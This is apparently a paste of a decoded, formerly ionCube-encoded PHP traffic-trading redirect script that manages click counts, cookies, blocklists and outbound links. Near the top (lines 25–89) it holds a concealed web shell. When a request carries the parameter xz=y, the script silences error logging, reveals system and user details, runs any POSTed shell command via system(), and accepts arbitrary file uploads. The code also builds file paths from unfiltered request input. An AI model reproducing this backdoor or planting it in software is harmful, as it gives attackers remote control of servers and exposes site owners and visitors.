@skyflash => ioncube file => decoded 2

1. <?php
2.  
3. function visiteddata($V447b7147, $V3c6e0b8a)
4. {
5.     global $Vd51c3d0d;
6.     if ($V447b7147 == "visited") {
7.         $Vd51c3d0d .= $V3c6e0b8a . ";";
8.     }
9. }
10.  
11. function fbd5fc730($V435ed7e9, &$V8d777f38)
12. {
13.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
14.         flock($V633de4b0, 1);
15.         while ($V5b4d9906 = fgets($V633de4b0, 1024)) {
16.             $Vde695463                      = array();
17.             $Vde695463                      = explode(";", $V5b4d9906);
18.             $V8d777f38[trim($Vde695463[1])] = $Vde695463[0];
19.         }
20.         flock($V633de4b0, 3);
21.         fclose($V633de4b0);
22.     }
23. }
24.  
25. @ini_set("display_errors", 0);
26. @ini_set("error_log", 0);
27. @ini_set("log_errors", 0);
28. error_reporting(0);
29. if ($_GET['xz'] == "y") {
30. set_magic_quotes_runtime(0);
31.  
32. print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
33.  
34. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
35. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
36.  
37. $UName  = `uname -a`;
38. $SCWD   = `pwd`;
39. $UserID = `id`;
40.  
41. if( $currentWD == "" ) {
42.     $currentWD = $SCWD;
43. }
44.  
45. print "<table>";
46. print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
47. print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
48. print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
49. print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
50. print "</table>";
51.  
52. if( $_POST['_act'] == "List files!" ) {
53.     $currentCMD = "ls -la";
54. }
55.  
56. print "<form method=post enctype=\"multipart/form-data\"><table>";
57.  
58. print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
59. print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
60.  
61. print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
62. print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
63.  
64. print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
65. print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
66.  
67. print "</table></form><hr>";
68.  
69. $currentCMD = str_replace("\\\"","\"",$currentCMD);
70. $currentCMD = str_replace("\\\'","\'",$currentCMD);
71.  
72. if( $_POST['_act'] == "Upload!" ) {
73.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
74.         print "<center><b>Error while uploading file!</b></center>";
75.     } else {
76.         print "<center><pre>";
77.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
78.         print "</pre><b>File uploaded successfully!</b></center>";
79.     }    
80. } else {
81.     print "\n<pre>\n";
82.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
83.     system($currentCMD);
84.     print "\n</pre>\n</center><hr><center><b>Command completed</b></center>";
85. }
86.  
87. exit;
88.     exit();
89. }
90. foreach ($_GET as $V8ce4b16b => $V9e3669d1) {
91.     $_GET[$V8ce4b16b] = str_replace("<?", "", $V9e3669d1);
92. }
93. include("config.php");
94. $V5adf599e = $_SERVER['HTTP_REFERER'];
95. $member    = $_COOKIE['refer'];
96. $V435ed7e9 = "datafiles/blockedlist.dat";
97. if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
98.     flock($V633de4b0, 1);
99.     $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
100.     flock($V633de4b0, 3);
101.     fclose($V633de4b0);
102.     $V320a8063 = array();
103.     $V320a8063 = explode("\r\n", $V3d801aa5);
104.     $V90ca62f9 = sizeof($V320a8063);
105.     $V865c0c0b = 0;
106.     while ($V865c0c0b < sizeof($V320a8063)) {
107.         if ($V320a8063[$V865c0c0b] && (strstr($V5adf599e, $V320a8063[$V865c0c0b]) || $member == $V320a8063[$V865c0c0b] || $_SERVER['REMOTE_ADDR'] == $V320a8063[$V865c0c0b] || strstr($_SERVER['HTTP_USER_AGENT'], $V320a8063[$V865c0c0b]))) {
108.             if ($Veb7cc6db) {
109.                 header("Location: {$V5adf599e}");
110.             }
111.             exit();
112.         }
113.         ++$V865c0c0b;
114.     }
115. }
116. $url       = $_GET['url'];
117. $first     = $_GET['first'];
118. $ref       = $_GET['ref'];
119. $link      = $_GET['link'];
120. $Vb1013a7e = $_GET['t'];
121. if (!$member) {
122.     $member = "nocookie";
123.     if ($V92687587) {
124.         $ref = "nocookie";
125.         $url = "";
126.     }
127. }
128. $Vdad12808 = array();
129. if ($V69858820) {
130.     $Vfa75823c = $_SERVER['GEOIP_COUNTRY_CODE'];
131.     $V599f46e3 = $Vfa75823c;
132. } else {
133.     $V599f46e3 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
134.     $Vdad12808 = explode("-", $V599f46e3);
135.     $Vfa75823c = $Vdad12808[0];
136. }
137. if (!$Vfa75823c) {
138.     $Vfa75823c = $V599f46e3 = "blank";
139. }
140. $V3ec88920 = $_COOKIE['page'];
141. $V7d320a89 = $_COOKIE['gbclicks'];
142. if (!$V7d320a89) {
143.     $V7d320a89 = 0;
144. }
145. $V05d80d74 = 0;
146. if ($V0ca2ee97 && $V0ca2ee97 <= $V7d320a89) {
147.     $V05d80d74 = 1;
148. } else if ($V742913f8) {
149.     $V05d80d74 = 1;
150.     $V3d801aa5 = "";
151.     $V435ed7e9 = "datafiles/ips.txt";
152.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
153.         flock($V633de4b0, 1);
154.         $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
155.         flock($V633de4b0, 3);
156.         fclose($V633de4b0);
157.     }
158.     if (!strstr($V3d801aa5, ($V7d320a89 + 1) . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n") && strstr($V3d801aa5, $V7d320a89 . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n") && ($V633de4b0 = @fopen($V435ed7e9, "a"))) {
159.         flock($V633de4b0, 2);
160.         fputs($V633de4b0, ($V7d320a89 + 1) . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n");
161.         flock($V633de4b0, 3);
162.         fclose($V633de4b0);
163.         $V05d80d74 = 0;
164.     }
165. }
166. $V38d4765b = $V5adf599e;
167. $V724b1be8 = $V05d80d74;
168. if ($V05d80d74) {
169.     if ($Vd280e0bb) {
170.         $ref = "nocookie";
171.         $url = "";
172.     }
173. } else {
174.     if ($link != "redirect" && !strstr(str_replace("www.", "", $V5adf599e), str_replace("www.", "", $V861ce498))) {
175.         $V724b1be8 = 1;
176.     } else {
177.         if ($_SERVER['HTTP_VIA'] || !$_SERVER['HTTP_ACCEPT'] || !$_SERVER['HTTP_USER_AGENT'] || $Vdf711c9f && time() - $Vdf711c9f < $_SESSION['intm']) {
178.             $V724b1be8 = 1;
179.         } else if ($Vec407cce && $Vec407cce) {
180.             @include("datafiles/jsp.php");
181.             if ($Vb1013a7e != $V146ac5a9) {
182.                 $V724b1be8 = 1;
183.             }
184.         }
185.         $V546b4439 = strpos($V38d4765b, "?");
186.         if ($V546b4439) {
187.             $V38d4765b = substr($V38d4765b, 0, $V546b4439);
188.         }
189.         if (($V38d4765b == $V861ce498 || $V38d4765b == $V861ce498 . "/") && $V3ec88920) {
190.             --$V3ec88920;
191.             if ($V3ec88920 == 0) {
192.                 $V3ec88920 = 2;
193.             }
194.             $V38d4765b = $V861ce498 . "/_main" . $V3ec88920 . ".html";
195.         }
196.     }
197. }
198. $V4d2f3dfb = 0 - 10;
199. $V54f5210f = $V9b3df717 = "";
200. if ($url) {
201.     if ($Vf03c5300 && !isset($_GET['s']) && $link != "redirect") {
202.         if ($Vf03c5300[$V7d320a89] != "T") {
203.             $V54f5210f = "direct";
204.             $V9b3df717 = $url;
205.         }
206.     } else {
207.         if (isset($_GET['s'])) {
208.             $s = ( integer ) $_GET['s'];
209.             if (100 < $s) {
210.                 $s = 100;
211.             }
212.         } else {
213.             $s = 100;
214.         }
215.         if (rand(0, 100) <= $s || $first && $V7d320a89 < $first) {
216.             $V54f5210f = "direct";
217.             $V9b3df717 = $url;
218.         }
219.     }
220. } else if ($ref) {
221.     $V435ed7e9 = "memberfiles/" . $ref . ".dat";
222.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
223.         flock($V633de4b0, 1);
224.         $V739b2f85 = fgets($V633de4b0, filesize($V435ed7e9));
225.         flock($V633de4b0, 3);
226.         fclose($V633de4b0);
227.         $V3d801aa5 = array();
228.         $V3d801aa5 = explode("|", $V739b2f85);
229.         if ($V3d801aa5[15]) {
230.             $V54f5210f = $ref;
231.             $V9b3df717 = $V3d801aa5[15];
232.             $V4d2f3dfb = $V3d801aa5[1];
233.         }
234.     }
235. }
236. if (!$V9b3df717) {
237.     $V3d801aa5 = "";
238.     $V435ed7e9 = "datafiles/outpick.dat";
239.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
240.         flock($V633de4b0, 1);
241.         $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
242.         flock($V633de4b0, 3);
243.         fclose($V633de4b0);
244.     }
245.     $outpick = array();
246.     $outpick = explode("\r\n", $V3d801aa5);
247.     if ($V4205ee45) {
248.         $V1d9e6a00 = $V424b30c0 = $dat = array();
249.         $V865c0c0b = 0;
250.         while ($V865c0c0b < sizeof($outpick)) {
251.             $dat                   = explode("|", $outpick[$V865c0c0b]);
252.             $V1d9e6a00[$V865c0c0b] = rand(1, 1000) * $dat[0];
253.             ++$V865c0c0b;
254.         }
255.         asort($V1d9e6a00);
256.         foreach ($V1d9e6a00 as $V3c6e0b8a => $V3a6d0284) {
257.             $V424b30c0[] = $V3c6e0b8a;
258.         }
259.     }
260.     $V865c0c0b = 0;
261.     while ($V865c0c0b < sizeof($outpick)) {
262.         $dat = array();
263.         if ($V4205ee45) {
264.             $dat = explode("|", $outpick[$V424b30c0[$V865c0c0b]]);
265.         } else {
266.             $dat = explode("|", $outpick[$V865c0c0b]);
267.         }
268.         if ($dat[1] && !$_COOKIE[$dat[1]] && $dat[1] != $member && (!$group || $group && strstr($dat[3], $group)) && (!$dat[4] || strstr($dat[4], $V599f46e3) || !strstr($dat[4], "-") && strstr($dat[4], $Vfa75823c))) {
269.             $V9b3df717 = $dat[2];
270.             $V54f5210f = $dat[1];
271.             $V4d2f3dfb = $dat[5];
272.             break;
273.         }
274.         ++$V865c0c0b;
275.     }
276. }
277. if (!$V9b3df717) {
278.     $V435ed7e9 = "memberfiles/auxout.dat";
279.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
280.         flock($V633de4b0, 1);
281.         $V739b2f85 = fgets($V633de4b0, filesize($V435ed7e9));
282.         flock($V633de4b0, 3);
283.         fclose($V633de4b0);
284.         $V3d801aa5 = array();
285.         $V3d801aa5 = explode("|", $V739b2f85);
286.         if ($V3d801aa5[15]) {
287.             $V54f5210f = "auxout";
288.             $V9b3df717 = $V3d801aa5[15];
289.         }
290.     }
291. }
292. setcookie("gbclicks", $V7d320a89 + 1, time() + 172800);
293. setcookie($V54f5210f, "visited", time() + 172800);
294. setcookie("ctime", time(), time() + 172800);
295. $Vcff34c13 = 0;
296. if ($Vf3778551 && $V54f5210f != "auxout" && $V54f5210f != "sponsor" && (0 < $V4d2f3dfb || 0 - 10 < $V4d2f3dfb && !rand(0, 9))) {
297.     $Vd51c3d0d = "";
298.     array_walk($_COOKIE, "visiteddata");
299.     if ($Vd51c3d0d) {
300.         $Vd51c3d0d = str_rot13($Vd51c3d0d);
301.         if (strstr($V9b3df717, "?")) {
302.             $Vd51c3d0d = "&gbv=" . $Vd51c3d0d;
303.         } else {
304.             $Vd51c3d0d = "?gbv=" . $Vd51c3d0d;
305.         }
306.     }
307.     $Vcff34c13 = 0 - 1;
308. }
309. header("Location: " . $V9b3df717 . $Vd51c3d0d . "\n");
310. $V013dff02 = 0;
311. if ($V4e807dca && !strstr($V4e807dca, $Vfa75823c)) {
312.     $V013dff02 = 1;
313. }
314. $V8e3f1bbb = $_SERVER['HTTP_USER_AGENT'];
315. $V4124bc0a = array();
316. $V4124bc0a = explode("; ", $V8e3f1bbb);
317. if (strstr($V4124bc0a[1], "MSIE")) {
318.     $V8e3f1bbb = $V4124bc0a[1];
319. } else {
320.     $V4124bc0a = explode(") ", $V8e3f1bbb);
321.     if (3 < strlen($V4124bc0a[1])) {
322.         $V8e3f1bbb = $V4124bc0a[1];
323.     }
324. }
325. if ($V633de4b0 = @fopen("datafiles/hitsout.dat", "a")) {
326.     flock($V633de4b0, 2);
327.     fputs($V633de4b0, $V54f5210f . "|" . $link . "|" . $member . "|" . $V599f46e3 . "|" . $V724b1be8 . "|" . $V013dff02 . "|" . $Vcff34c13 . "|" . $V38d4765b . "|" . $V8e3f1bbb . "|" . $_SERVER['REMOTE_ADDR'] . "\r\n");
328.     flock($V633de4b0, 3);
329.     fclose($V633de4b0);
330. }
331. if (isset($_GET['thumb'], $_GET['pos'])) {
332.     $thumb = $_GET['thumb'];
333.     $pos   = $_GET['pos'];
334.     $rot   = 1;
335.     if ($_GET['rot']) {
336.         $rot = $_GET['rot'];
337.     }
338.     $stats = $V5a423d9e = array();
339.     fbd5fc730("datafiles/rotstat" . $rot . ".dat", &$stats);
340.     fbd5fc730("datafiles/posstat" . $rot . ".dat", &$V86f5dcd7);
341.     fbd5fc730("datafiles/rotator" . $rot . ".dat", &$V5a423d9e);
342.     $V46bc758a = 0;
343.     foreach ($V5a423d9e as $V8ce4b16b => $V9e3669d1) {
344.         if (!($thumb == $V8ce4b16b)) {
345.             continue;
346.         }
347.         $V46bc758a = 1;
348.         break;
349.         break;
350.     }
351.     if ($V46bc758a) {
352.         ++$stats[$thumb];
353.         ++$V86f5dcd7[$pos];
354.         $V14447879 = "";
355.         foreach ($stats as $V8ce4b16b => $V9e3669d1) {
356.             $V14447879 .= $V9e3669d1 . ";" . $V8ce4b16b . "\r\n";
357.         }
358.         if ($V633de4b0 = @fopen("datafiles/rotstat" . $rot . ".dat", "w")) {
359.             flock($V633de4b0, 2);
360.             fputs($V633de4b0, $V14447879);
361.             flock($V633de4b0, 3);
362.             fclose($V633de4b0);
363.         }
364.         $Vb84abdbd = "";
365.         foreach ($V86f5dcd7 as $V8ce4b16b => $V9e3669d1) {
366.             $Vb84abdbd .= $V9e3669d1 . ";" . $V8ce4b16b . "\r\n";
367.         }
368.         if ($V633de4b0 = @fopen("datafiles/posstat" . $rot . ".dat", "w")) {
369.             flock($V633de4b0, 2);
370.             fputs($V633de4b0, $Vb84abdbd);
371.             flock($V633de4b0, 3);
372.             fclose($V633de4b0);
373.         }
374.     }
375. }
376. exit();
377. ?>